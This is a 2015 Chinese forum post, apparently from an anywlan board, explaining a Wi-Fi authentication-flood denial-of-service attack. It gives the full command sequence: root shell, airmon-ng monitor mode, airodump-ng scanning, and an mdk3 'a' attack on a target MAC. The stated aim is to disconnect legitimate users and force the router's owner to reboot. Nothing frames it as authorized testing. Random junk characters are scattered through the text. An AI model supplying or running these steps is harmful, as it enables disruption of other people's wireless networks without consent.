本帖最后由 191966260 于 2015-2-2 22:49 编辑
3 d$ k' D/ Q3 `& O" a( j
* e% _; r6 J( Q0 e2 W5 a- r身份验证攻击效果说明:
h6 c6 q# f. |& j% M9 x: G" P此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。 2 F# m! _- o2 p, ^0 O
下面是我整理的整个攻击的步骤及命令,有不明白兄弟可以留言探讨! (很多兄弟都会发现自己的linux系统中找不到mdk3,然后满世界去找mdk3,却发现无处下载。哈哈,其实你们的Linux中都是有mdk3的,只是菜单里找不到而已,我们用终端命令就可以打开它了!BELIEVE ME!) 打开终端并获取root权限(鼠标右键单击或者菜单里都可以找到终端):: S$ `) y W; p1 d" k
sudo su 或 sudo -i
& f! n! p4 w8 K& X打开mdk3:; j4 Z3 Y S$ G3 G# A. d0 O1 V
sudo mdk3 首先检测网卡:% q% {( f. E1 R* T& w( D
ifconfig -a 然后模拟端口(一般默认wlan0):% m9 A3 I) w. E% w3 g' _; \2 C
airmon-ng start wlan0 接着扫描AP(ctrl+c暂停):
4 `; z) Z/ l$ y: t, D- Iairodump-ng mon0 最后用mdk3做身份验证攻击(举例:mdk3 mon0 a -a 00:00:00:00:00). f- d; G6 R+ Y% P
mdk3 mon0 a -a mac
8 q E) t: j9 E l
* ?1 q3 B6 [2 I r
6 I u8 R; A6 R# j1 Y( O, ~# ]7 ]- j9 ~2 o
爱生活,爱anywlan,我是阿龙!- [8 S8 q# F& v
|